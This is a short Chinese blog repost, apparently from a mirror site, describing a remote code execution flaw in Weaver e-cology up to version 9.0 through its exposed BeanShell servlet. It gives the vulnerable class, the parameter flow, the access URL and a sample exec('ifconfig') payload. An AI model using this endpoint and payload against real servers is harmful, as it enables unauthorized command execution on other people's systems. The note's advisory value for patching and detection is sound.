博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
泛微 e-cology远程代码执行漏洞
阅读量:4316 次
发布时间:2019-06-06

本文共 351 字,大约阅读时间需要 1 分钟。

影响版本:泛微 e-cology<=9.0

漏洞分析:    

问题出现在 resin 下 lib 中的 bsh.jar 文件里,问题类 bsh.servlet.BshServlet,可 doGet 方法从 getParameter 中接收参数, Request 请求会交给evalScript 方法来进行处理。

参数传递

doGet--》getParameter--》 evalScript--》 localInterpreter.eval

 

 

漏洞利用:访问 http://url/weaver/bsh.servlet.BshServleth

 

 

输入payload

exec("ifconfig")

 

 

转载于:https://www.cnblogs.com/junsec/p/11558290.html

你可能感兴趣的文章
unity3d 射弹基础案例代码分析
查看>>
thinksns 分页数据
查看>>
os模块
查看>>
LINQ to SQL vs. NHibernate
查看>>
基于Angular5和WebAPI的增删改查(一)
查看>>
windows 10 & Office 2016 安装
查看>>
最短路径(SP)问题相关算法与模板
查看>>
js算法之最常用的排序
查看>>
Python——交互式图形编程
查看>>
经典排序——希尔排序
查看>>
团队编程项目作业2-团队编程项目代码设计规范
查看>>
英特尔公司将停止910GL、915GL和915PL芯片组的生产
查看>>
团队编程项目作业2-团队编程项目开发环境搭建过程
查看>>
Stax解析XML示例代码
查看>>
cookie
查看>>
二级图片导航菜单
查看>>
<Using parquet with impala>
查看>>
OpenGL渲染流程
查看>>
委托异步回调
查看>>
扩展欧几里得算法
查看>>
喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!-- 愿君每日到此一游!
当前时间: 2024-10-06 09:19:55   当前IP: 3.21.248.162   联系邮箱:javaeecc@qq.com     Copyright © 2020 - 2022 baihongyu.com 京ICP备2021015314号-2
强烈建议你试试无所不能的CHAT-GPT,快点击我
强烈建议你试试无所不能的CHAT-GPT,快点击我